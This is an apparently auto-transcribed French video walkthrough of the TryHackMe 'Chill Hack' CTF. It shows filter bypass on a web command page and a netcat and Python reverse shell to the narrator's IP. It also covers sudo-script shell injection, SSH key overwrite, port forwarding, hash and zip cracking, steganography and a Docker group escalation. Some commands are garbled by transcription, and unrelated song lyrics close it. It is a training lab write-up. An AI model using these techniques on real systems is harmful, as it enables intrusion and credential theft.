Bonjour et bienvenue à tous sur cette nouvelle vidéo CTF sur la plateforme TryHackMe. On est sur le CTF Chill Hack qui est en difficulté Easy, qui est un CTF donc gratuit et que j'ai déjà fait il y a un moment. On n'a que deux questions, donc on a le flag utilisateur et le flag route à récupérer. Bon bah c'est parti, j'ai déjà ma machine virtuelle ici. Ok donc voilà, j'ai créé un répertoire exprès pour ce CTF. Donc on va commencer par un scan Nmap. Nmap, donc un scan agressif, -p-on, nmap results.txt. Ok donc on a le port 21 qui est ouvert pour le service FTP. On voit que le login Anonymous est autorisé et on a même un fichier ici qui a été énuméré. On a le port 22 qui est ouvert pour le service SSH, donc on a OpenSSH 7.6 encore pour Ubuntu, on a souvent des machines Ubuntu. Et le port 80 qui est ouvert pour le service HTTP, donc il y a un serveur web 2.4.29. Je sais plus si c'est une version récente ou pas, ça. Il me semble que oui. Bon, on vérifiera plus tard si jamais. Pour l'instant, ce qu'on pourrait faire, ce serait déjà aller énumérer le port 21. C'est ce qu'on va faire. On va récupérer le fichier qui est sur le service FTP 124 Anonymous, pas de mot de passe, voilà. Et si je fais ls-la, alors on n'a qu'un seul fichier, donc note.txt. Voilà, exit. cat note.txt. Anurot m'a dit qu'il y avait certains filtres sur les chaînes de caractères qui sont rentrés dans les commandes à part. Dans quelle commande? Bon, je vais déplacer ça dans un répertoire FTP. Bah là, ce qu'on pourrait faire maintenant, c'est énumérer le service HTTP. Déjà, première chose, je vais utiliser GoBuster comme d'habitude pour essayer de trouver des pages ou des répertoires intéressants. 10.10.200.124/-w 2.3 medium et j'enregistre ça dans un fichier. Et pendant que ça se fait, bon déjà on a un répertoire image, bon CSS, JS. Pendant que ça se fait, je vais aller avec le navigateur web, on va aller sur le port 80, voir si on trouve des choses à la main. Ah, ici, GoBuster a trouvé une page /secret. On va aller voir ce qu'il y a dessus. Tiens, on va aller voir sur la page index s'il y a quelque chose. Ouais, bon, je pense pas qu'il y ait quelque chose d'intéressant ici. On va aller dans /secret. C'est là qu'on doit taper des commandes, du coup, j'imagine. Donc, on sait qu'il y a certains filtres qui sont mis en place. J'ai envie de vérifier si les filtres sont pas... Je me demande où est-ce qu'ils ont été mis, en fait. Parce que si c'est dans un fichier côté client, genre dans un fichier JS ou autre, ça peut être... on peut modifier, mais je pense pas. Ah non, j'ai pas l'impression. On va essayer de taper Huamai, par exemple. Execute 3W data. Ah ok, bon bah on peut taper des commandes Linux ici. Je vais essayer ls. Êtes-vous un hacker? Alerte, condition rouge. Ah, et si je retape Huamai. Ok, il y a des commandes qui sont interdites. Un truc qu'on peut faire pour essayer de bypass ça, c'est utiliser un anti-slash, par exemple L anti/s execute. Et ça marche. On a déjà trouvé comment bypass, au moins pour la commande ls. Je sais pas pour les autres commandes comment ça va se passer, si c'est la même manière. Je pense que pour les autres commandes ça sera similaire. Si je fais L anti/s -la, on a donc un fichier index.php, image, ok. Alors moi l'idée que j'ai là, ce serait d'héberger un serveur web temporaire sur notre machine. Bah non, aucun intérêt, je peux direct taper un reverse shell ici, je suis bête. Est-ce qu'il y a netcat? Je vais taper nc, ok, n anti/c, which nc peut-être. Ok, ouais, donc il y a netcat. Donc on va essayer d'avoir un reverse shell. Donc je vais... Allez, ici, je laisse tourner pour l'instant. Quand on aura un reverse shell, je pourrai l'arrêter. Je vais mettre sur écoute nc-lnvp 4242. Je vais essayer d'avoir un reverse shell sans aller voir sur un générateur de reverse shell. Il me semble qu'avec netcat, avec l'option -e, on peut avoir un reverse shell. Si je tape n anti/c pour bypass le filtre, mon adresse IP 10.14.32.60 que je dois changer depuis je sais pas combien de vidéos, c'est pas grave. Et 4242-e/bin/sh. Ah, ça n'a pas marché. Écoutez, je vais faire un truc plus simple. C'est la première idée que j'avais, c'est peut-être pas la plus rapide entre guillemets, il y a peut-être des étapes plus simples. Je vais simplement télécharger un reverse shell en PHP sur le serveur web. Voilà, donc j'ai copié un reverse shell en PHP dans le répertoire du CTF là, php reverse shell.php. On va juste vérifier que l'adresse IP et le port sont bien configurés. Ouais, c'est bon. Je vais héberger un serveur web ici, python 3-m http.server 8080. Voilà. Et ici, on va essayer de télécharger du coup. Est-ce qu'il y a wget? Ah, il y a wget, parfait. Wget, juste voir si wget c'est une commande autorisée. Ok. Wget http 10.14.32.60 2.8080 php-reverse
shell.php. Ok, on a bien reçu une connexion, vous voyez ici de l'adresse IP cible, de la machine cible, get. Maintenant si je fais ls anti/s-la, on devrait avoir un fichier. Ah non, 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 on l'a pas. Ah, mais on n'a pas le droit d'écriture dans le répertoire où on est en fait. Je fais sudo-l. Bon écoutez, j'arrive pas à avoir un reverse shell ni à télécharger un reverse shell en PHP. Je vais essayer d'utiliser un générateur de reverse shell, voilà, celui-là. Et je vais essayer avec ça. Je vais mettre sur écoute, donc, hop, CTRL-C, clear. nc-lnvp 4242, on va coller ça ici. Radio hacker, à mon avis c'est SH qu'il a pas aimé. Voilà, c'était ça. Toujours pas, toujours pas, toujours pas. Peut-être en Python, est-ce qu'il y a Python sur la machine cible? Oui, Python. Bon, j'imagine que si la commande a été filtrée, c'est qu'il y a sûrement Python du coup dans la logique. Ok, il y a Python 3, on va essayer d'avoir un reverse shell avec Python 3 du coup. On va y arriver, on va y arriver. Hop. Ah, j'ai obtenu un reverse shell, parfait. Ok, bon. Donc, j'ai essayé un reverse shell avec Netcat, ça n'a pas fonctionné. J'ai essayé de télécharger un reverse shell en PHP, ça n'a pas fonctionné puisqu'on n'avait pas les droits d'écriture dans le répertoire du serveur web. Et là, donc, j'ai essayé avec un reverse shell en Python et ça fonctionne. Donc maintenant, on va stabiliser notre shell, Python 3-c. C'est toujours la même chose hein, pour stabiliser le shell. En tout cas, moi, j'ai jamais fait autrement. Là, je vais faire export term égale xterm, CTRL Z, G. Voilà, et on a un shell qui est stabilisé maintenant. Ok, donc si je fais ls-la, cd. On avait peut-être le droit d'écriture dans le répertoire précédent. Même pas, ouais, non. On pouvait pas télécharger de reverse shell. Du coup, bah, on a déjà un reverse shell, c'est cool. cd/home, ls-la. Ok, il y a 3 répertoires utilisateurs ici. Il y a un seul répertoire où on a le droit d'écriture ici, vous voyez, avec le R pour read. Je vais aller dans à part, ls-la. Ok, bon, il a un répertoire .ssh, on n'a pas le droit d'écriture dedans, mais de lecture, oui. Donc on va voir s'il n'y a pas sa clé privée après. On peut pas lire son historique bash, on peut pas lire le flag. Je vais aller dans .ssh, ls-la. Ok, non, il n'y a pas sa clé, privée, donc là on peut rien en faire. À la limite, si on avait le droit d'écriture sur ce fichier-là, on aurait pu écraser la clé publique de à part pour après se connecter en SSH avec notre clé privée à nous, mais là on peut pas puisqu'on n'a pas le droit d'écriture. J'ai vu que quand on avait fait sudo-l, voilà, on a le droit d'exécuter /home/apart/.helpline.sh en tant que apart justement. cat.helpline.sh. Qu'est-ce qu'il y a dans ce fichier? Ok, c'est un script bash, ok, ouais, bon ça on l'a vu à l'extension. Bienvenue dans le helpdesk, donc le support, j'imagine que ça veut dire. Vous pouvez parler à qui vous voulez quand vous voulez. -p, donc ça c'est pour, il me semble, je connais pas tout. Enfin, je suis pas trop calé en bash pour l'instant, mais il me semble que ça c'est l'équivalent de la fonction input en Python. Donc c'est pour récupérer une entrée utilisateur, read-p. Alors -p, je saurais pas dire à quoi ça sert, mais donc là on doit rentrer la personne à qui on veut parler, personne. Attendez, du coup là on peut juste avoir un shell en fait, parce que si on met par exemple /bin/bash dans la variable msg, en fait ça va juste simplement exécuter /bin/bash et ça va nous ouvrir un shell, j'imagine. Écoutez, on va faire ça. Donc je vais faire sudo-u à part, puisqu'on peut l'exécuter qu'en tant que à part, ici on le voit, /home/apart/.helpline.sh. Donc à qui on veut parler, test, on s'en fiche. Et là je mets /bin/bash ls. Ouais ben c'est bon, ls-la. C'est bon, ben on a un shell en tant que whoami, en tant que à part, c'est bon. Je vais juste le restabiliser, du coup je suis obligé. Ah non non, sinon je suis bête. J'ai une solution plus simple. Maintenant on doit avoir le droit d'écriture là-dedans, puisque ça appartient à part. Je vais juste lire le flag local.txt. Pourquoi il n'est pas apparu? Cat, local.txt. Ça n'a pas voulu lire, je me suis demandé ce qu'il y avait. Donc on a le flag user, ok, copier. On va le renseigner ici. Coller. Et donc on va essayer d'avoir un shell plus stable, mais on va pas s'embêter. On va carrément écraser la clé publique SSH de à part pour ensuite utiliser notre clé privée pour se connecter sur le compte à part. Donc faire cd.ssh. Je suis bien dans le bon répertoire là, ok. Donc là on a le fichier authorized keys. Donc si je le lis, on va voir ce qu'il y a dedans. Vous voyez, il y a une clé publique SSH. Donc on va simplement ouvrir un nouveau terminal. Ça je peux la... Ah, c'est déjà arrêté, ok. On va simplement générer une paire de clés SSH, donc une clé privée et une clé publique. SSH-keygen-f idrsa. Pas de passphrase, on s'en fiche, ouais, pas de passphrase. Donc là, ça nous a généré deux fichiers, idrsa et idrsa.pub. Donc ça, c'est la clé publique qu'on doit mettre sur la cible, et ça, c'est la clé privée qu'on va utiliser pour se connecter sur la cible en tant que à part. On va simplement lire la clé publique, cat idrsa.pub. Donc voilà, là, on a la clé publique. Hop, je vais la copier. Et si on va faire echo, on ouvre des guillemets, copie la clé publique, on ferme les guillemets, et on redirige tout ça vers le fichier authorized keys. Oups.
Et maintenant, si je fais cat auto-reset-keys, voilà, c'est bon. Putain, on a réussi enfin. Bon, donc là, ce que j'ai fait, c'est que j'ai écrit ma clé publique SSH que j'ai générée moi à la place de la clé publique de apart. Et comme cette clé publique correspond à la clé privée que j'ai générée tout à l'heure aussi, bien maintenant je peux me connecter en SSH en tant que apart. Voilà. Imaginez un peu la clé publique comme, je vulgarise assez, hein, mais imaginez la clé publique là comme un cadenas et la clé privée qu'il y a ici, c'est la clé du coup qui sert à ouvrir ce cadenas. Donc si vous remplacez le cadenas pour qu'il corresponde à votre clé, ça marche. Voilà, en gros, c'est un peu ça. Donc je vais faire SSH apart @10.10.200.124 104 et on précise la clé privée -i IDRSA. Yes. Et voilà. Donc maintenant on est connecté en SSH en tant que apart. Donc on a un shell stabilisé, on va dire, et puis surtout on pourrait dire un checkpoint. Je sais pas si on peut dire ça comme ça. C'est-à-dire que là maintenant on a un accès à la machine plus rapide si jamais on veut se reconnecter. Si jamais on est déconnecté ou autre, on peut se reconnecter facilement en SSH. On n'a pas à repasser par un reverse shell en Python, etc. Maintenant, je vais faire sudo -l pour voir si on a des droits sudo. On n'a pas plus de droits. /etc/crontab. Rien d'intéressant dans la crontab. .d. Je crois pas qu'il y ait quoi que ce soit. De toute façon, on n'a pas les droits d'écriture ici, donc tant pis. Même là, les fichiers sont pas intéressants. C'est des fichiers de base, je crois, qui sont là par défaut. Est-ce que maintenant on a le droit d'écriture de lecture dans notre .bash history? Logiquement, oui. Bon, il n'y a rien dedans. De toute façon, il faisait 0 octet, j'aurais dû le voir. Est-ce que j'ai accès en lecture dans les autres répertoires utilisateurs? Non, j'ai pas l'impression. ID, on appartient à quel groupe? Rien d'intéressant dans les backups. Enfin, on a des fichiers intéressants, mais on n'y a pas accès on n'y a même pas accès en lecture ici. cat/etc/pass.wd, peut-être qu'il y a un utilisateur pour je ne sais quelle raison qui aurait son H ici, non? Est-ce que peut-être ls-la/etc/shadow? On n'a pas le droit de lecture dessus, et le fichier pass.wd, on a le droit d'écriture ou pas? Non. Je vais aller à la racine, ls-la. Il y a peut-être quelque chose d'intéressant ici. Dans médias, il y a quoi? Rien. Si je fais ls-la/opt, il y a un conteneur. Ouais, on n'a pas le droit d'accès en lecture, mais visiblement il y a un conteneur qui tourne probablement sur la machine. Pour voir ça, on pourrait, si je fais docker-help container ls, ok, on n'a pas le droit de docker ps, on n'a pas les permissions. Mais j'ai l'impression qu'il y a un conteneur qui tourne sur la machine. Si je fais netstat, est-ce qu'il y a un conteneur qui est connecté? Regardez là encore. containerd.soc, c'est connecté. Ouais, donc on a bien un conteneur qui est en cours d'exécution sur la machine, hein, j'ai l'impression. Par contre, je me rappelle plus comment on affiche les ports. -help. Avec -t, on peut afficher les ports. Je cherche à côté sur Google. Ici, regardez, on a la machine qui est sur écoute sur le port 9001. Voilà, listen sur écoute. MySQL aussi. Ce port 9001 là, on a vu tout à l'heure quand on a fait un scan and map, on n'a pas trouvé ce port là ouvert parce qu'en fait on peut pas y accéder depuis l'extérieur. Par contre, on peut y accéder depuis cette machine. Le problème, c'est qu'il n'y a pas Nmap sur cette machine. On pourrait essayer de mettre un exécutable d'Nmap, télécharger un exécutable d'Nmap sur cette machine pour ensuite énumérer ce port. Ou on pourrait créer un tunnel. Enfin, on pourrait faire du port forwarding, ça s'appelle, en passant par un tunnel SSH. On va essayer de faire ça. On va faire exit. Et on va essayer de faire un tunnel, afin de faire un port forwarding, donc une redirection de port, en gros en français. Excusez-moi, j'ai l'habitude de dire ça en anglais, parce que comme je le lis tout le temps en anglais sur des docs ou quoi, j'ai l'habitude de le dire en anglais du coup. Donc apart, @10.10, c'était quoi l'adresse IP déjà? 10.10.200.124, ok. -i, IDRSA, -l, c'était le port, donc je vais mettre, c'était 9001 il me semble. Quand on va se connecter à notre propre port 9001, ça va nous rediriger vers le port que je définirai après, mais je vais mettre les deux mêmes ports, comme ça on est tranquille. On va pas s'en mêler les pinceaux. Donc là je remets l'adresse IP 10.10.200. Ici c'est mon adresse que je dois taper en fait. Ça c'est l'adresse d'écoute, voilà. Donc c'était pas un problème, j'avais essayé un autre port pour voir si c'était pas un problème de port, mais non. Donc là ce que j'ai fait du coup, c'est que j'ai tapé une commande qui sert à créer une redirection de port, donc un port forwarding, en passant par un tunnel SSH, parce qu'en fait le port 9001, comme je l'ai dit, n'est pas accessible depuis l'extérieur, depuis ma machine. Je n'ai pas le droit d'accéder au port 9001 de la machine cible. Par contre, la machine cible a elle-même accès à son propre port 9001.
sur lequel tourne un service. Du coup, ce qu'on fait, c'est qu'on utilise un port forwarding, c'est-à-dire qu'on va envoyer les données par le tunnel SSH, et une fois que les données en gros sont arrivées sur la machine cible, ensuite elles seront envoyées sur le port 9001. Le but en fait c'est de pouvoir accéder au port 9001 de la machine cible, même si on n'est pas censé y avoir accès depuis l'extérieur normalement. Voilà, en gros. Et donc là j'ai défini que pour accéder au port 9001 de la machine cible, je dois me connecter à mon adresse IP, donc 127.0.0.1, sur le port 9001 ici. Si je voulais que ce soit sur mon port 8080, j'aurais mis 8080. En gros, faut pas oublier d'utiliser la clé privée avec -i-idrsa et donc -l majuscule, donc oui c'est pour justement créer la redirection de port. Donc je fais entrer, voilà je suis connecté en SSH et normalement là si je fais nmap 127.0.0.1-p9001-a, bon j'annule ça sert à rien, je vais pas utiliser l'option -a mais -sv plutôt. Ah, et ben voilà quand ça veut. Et donc on voit que sur le port 9001, sur notre port, mais ça redirige vers le port 9001 de la cible, donc on voit qu'il y a donc sur le port 9001 le service HTTP qui est ouvert, donc oui. Il y a Apache HTTPD 2.429 pour Ubuntu. Donc ouais, on a un serveur web qui tourne sur le port 9001. On va voir ce qu'il y a dessus. Localhost 2.9001. Ah, et on arrive là-dessus, ok. Customer portal, login. Je sais pas trop ce que c'est. Il n'y a pas d'informations sur une version quoi que ce soit. Écoutez, on va essayer admin peut-être. Admin. Valide username or password. Root. Oula. Root. Toujours pas. Si je tape admin, peut-être qu'on peut faire une injection 1 = 1 password. J'ai peut-être une idée. On a vu tout à l'heure. Regardez MySQL. Ouais, mais on n'a pas les. Attendez. -u root -p root. Ah non, on n'a pas d'identifiant pour MySQL. Peut-être, on va aller voir sur le site web. C'est des files. Il y a quoi dans files? Tiens, on n'est pas allé voir ça. Files. Account hacker.php, account.php. Il y a quoi dans account.php? Classe account, public, discon. Donc ça, c'est la page sur laquelle on est sur le navigateur là. C'est le code de cette page en fait. De la page index plutôt. Mais le truc c'est que là on a l'air de pouvoir faire une injection SQL là. Je suis pas sûr mais si je fais, attendez, ls-la cat index.php, est-ce qu'on a... Ah, oh, là on a regardé. Donc là déjà on a le nom de la base de données concernée et on a donc le mot de, enfin l'identifiant route et le mot de passe de la base de données. Donc on va s'y connecter, c'est ça que je cherche en fait. MySQL-u route-p avec voilà le mot de passe qu'on a trouvé dans le code PHP. Et maintenant si je fais use, c'était quoi le nom de la base de données utilisée? C'était web portal. Ok, si je fais show tables, ah, et select étoile from users, oups j'ai oublié le point virgule, et donc on a deux noms d'utilisateurs ici et deux, c'est un HMD5, donc on va le copier et on va essayer de le craquer. Ou alors attendez, on va juste faire un truc, je vais voir si on peut, parce qu'il me semble qu'on peut faire une injection SQL normalement. Ouais bon, peut-être que je suis nul aussi, je suis pas très doué pour les injections SQL. D'ailleurs c'est un truc sur lequel il faudrait que je m'entraîne. Plus, il y a une room sur Try Avec Me que j'avais fait mais qu'il faudrait que je refasse. Je la ferai peut-être en vidéo du coup. On va faire echo, hop, je vais coller ça dans un fichier h.txt et on va essayer de craquer ce hash avec John. h.txt-wordlist égale /usr/share/wordlist/rockyou.txt -format. Et là je précise le format, pardon. Je crois que c'est ça, le format du hash. Donc c'est row md5 si je me trompe pas. Et on a trouvé le mot de passe. Donc don't ask, don't tell. Ça s'écrit comment? Il y a deux A, ouais. Ok, et le mot de passe collé. Et on est connecté. Qu'est-ce que c'est que ça? On a trois choses. On a juste un fichier donc hacker.php. C'est la page sur laquelle on est. Mais dans le code source HTML il n'y a rien. Rien d'intéressant. On a deux fichiers images qui sont utilisés. Donc un fichier JPG, un fichier GIF. Il n'y a rien d'autre, je pense, à moins dans les en-tête, mais ah non, j'ai pas l'impression. À mon avis, ça doit être comme dans le CTF précédent, on doit avoir quelque chose caché dans un des deux fichiers là. Alors dans le fichier GIF, je sais pas du tout si on peut cacher des données, avec StackHide. Par contre, on a un fichier JPG et on sait que les fichiers JPG peuvent servir à ça. Donc je vais enregistrer ces deux fichiers. Et donc ls, je vais reclire, pardon, ls. Donc on a deux fichiers. On va faire stag hide -extract
SF et on va voir si on peut extraire quelque chose du fichier JPG, pas de passphrase. Et on a extrait un fichier backup.zip, ls-la. On va faire unzip backup.zip. Je sens qu'il va y avoir un mot de passe sur ce fichier. Ouais, évidemment. Donc là, on l'a fait dans le CTF précédent, donc toujours pareil, on va faire zip to John. Donc le fichier c'était backup.zip et on va rediriger ça vers le fichier hash.txt. Et donc maintenant on a un hash qui a été généré pour le fichier zip. On va pouvoir craquer ce hash pour trouver le mot de passe du fichier zip. Donc John hash.txt wordlist égale /usr /share /wordlist /rockyou.txt. Et donc on a trouvé le mot de passe, c'est pass 1 word. Donc là si je fais du coup set zip ou unzip, je peux utiliser unzip je pense. Hop, je colle le mot de passe et on a le fichier sourcecode.php ls 4 sourcecode.php. On a un mot de passe encodé en base 64 déjà je vois. Base 64 en code, $password. On va décoder ça, on va voir. Vous savez quoi, non, je vais vous montrer avec un outil, enfin je vous montrer en ligne de commande, même s'il y a des outils en ligne. Comme j'utilise tout le temps des outils en ligne, on va changer un peu, on va faire echo ce truc là, cette chaîne de caractères, et on va reprendre la sortie et on va faire base 64-d don't know my password. Et donc là on a un mot de passe, alors je sais pas de quoi, mais c'est un mot de passe visiblement. Donc je vais le copier, je vais me le noter quelque part, là je vais faire nano note, on va le copier ici, comme ça on l'a de côté. Alors, admin portal, visiblement ce serait le mot de passe de Anurod. On va voir s'il a le même mot de passe sur son compte local, sur la machine. Donc je vais faire su Anurod et le mot de passe je colle et on est connecté en tant qu'Anurod, voilà c'était ça. Je vais aller dans son répertoire du coup pour voir ce qu'il y a, ls-la. Donc il y a le fichier sourcecode.php en question, ok. Le fichier bombage historique qui fait 0 octet, il est vide. Il n'y a rien, peut-être qu'on a des droits sudo-l. Je me suis peut-être réjoui un peu trop vite. ID. Ah, déjà un truc qui est différent là qu'on n'avait pas sur l'utilisateur à part. Là sur cet utilisateur, on fait partie du groupe Docker. Donc peut-être qu'on va pouvoir se servir de Docker pour élever nos privilèges. Je sais que c'est possible, il y a des manières d'élever ses privilèges comme ça. Ce que je vais faire avant, je vais créer un dossier .ssh, cd.ssh, ls. Je vais faire pareil que tout à l'heure, je vais mettre ma clé privée SSH ici, cat authorized keys, ok, et là du coup si j'essaie de me connecter en SSH en tant que anurod @10.10.200.124-i ça fonctionne, ok, donc au moins ça nous fera gagner du temps. Je peux fermer ça, je peux fermer ça, là si je me reconnecte, voilà donc ok. Donc maintenant on peut se connecter en SSH en tant qu'Anurod, ok, ça c'est bon. On a accès à Docker, si je fais Docker container ls, tout à l'heure on n'avait pas accès à cette commande, mais visiblement il n'y a aucun, ok. Je vais aller sur GTFOBins pour voir s'il y a moyen d'élever ses privilèges, d'exploiter Docker. On peut avoir un shell. Si je fais donc Docker run-v /rm-it alpine sh who am I. Oups, who am I. Je suis root, ok, hostname. Donc là on est dans le Docker, on est en tant que root mais dans le Docker. Mais peut-être que le flag root est dans le Docker du coup. Si je vais dans /root ls-la proof.txt proof.txt.swp proof.txt, on a le flag root ici, ok, bon ben c'est terminé, on a le flag root. Pour un CTF de niveau facile, j'aurais plutôt dit que c'était un CTF de niveau moyen, honnêtement. Mais voilà, on a pu tester, on a pu pratiquer des choses qu'on n'a pas pu pratiquer avant, qu'on n'a jamais fait avant, en tout cas sur ma chaîne. Hop, c'est terminé, donc le CTF est terminé. C'était vraiment intéressant comme CTF. Donc en gros, qu'est-ce qu'on a fait? Comme d'hab, on a énuméré les ports ouverts avec Nmap. Ensuite, on a pu trouver un fichier dans le service FTP qui était accessible avec le compte Anonymous sans mot de passe. On a pu récupérer un fichier qui n'était pas nécessaire mais qui nous donnait une information sur des filtres qui seraient quelque part. Donc sur le port 80 qu'on a énuméré, on a trouvé un endroit où on pouvait taper des commandes sur la machine depuis une page web. Donc c'était un web shell en gros. Et on a pu trouver comment bypass les filtres. Par exemple, on n'avait pas le droit de taper la commande ls. En fait, il suffisait de faire l anti/s, voilà, pour bypass les filtres. Donc on a pu avoir un reverse shell en passant par là. Ensuite, on a pu élever nos privilèges avec un fichier sur lequel qu'on pouvait exécuter en tant que à part.
Ensuite, on a fait une redirection de port pour accéder à un port accessible que localement, normalement, le port 9001. On avait trouvé dans la base de données MySQL les identifiants, donc on a pu se connecter sur le port 9001. Il y avait une image qui contenait un fichier caché, grâce à la stéganographie. On a pu extraire ce fichier avec steghide. Après, on a craqué le mot de passe du fichier en question, de l'archive qu'on a trouvé. Une fois qu'on a craqué cette archive, on a trouvé le code source d'une page qui contenait visiblement un mot de passe encodé en base 64 pour Anurod. Et malheureusement, Anurod avait utilisé ce même mot de passe sur son compte local, sur la machine. Donc on a pu se connecter en tant qu'Anurod. Et après ça, donc, on a pu élever nos privilèges. Élever nos privilèges, pas exactement en fait. On a pu accéder en tant que route au conteneur. Et donc dans ce conteneur, on a trouvé le flag route. Voilà. C'était long, il y avait beaucoup d'étapes. Heureusement que ces choses-là, je les avais déjà fait auparavant, parce que sinon j'aurais mis beaucoup plus de temps à trouver, je pense. En tout cas, c'était très intéressant comme CTF. J'espère qu'il vous aura plu. Je vous mettrai comme d'habitude le compte rendu en anglais en description, compte rendu écrit. Je vous mettrai le lien de la room dans la description, ainsi que toutes les documentations utiles qui sont en rapport avec ce que j'ai fait dans la vidéo. J'espère que ça vous aura plu. N'hésitez pas à me dire ce que vous en avez pensé en commentaire, à liker si vous avez aimé la vidéo, et à vous abonner si vous voulez suivre les prochaines vidéos qui sortiront. Et moi je vous dis à la prochaine. I'm taking 6 shots, yeah, straight to the face. And I wanna get lost, I'm sick of this place. Don't know how to stop when I'm feeling this way. So I'm taking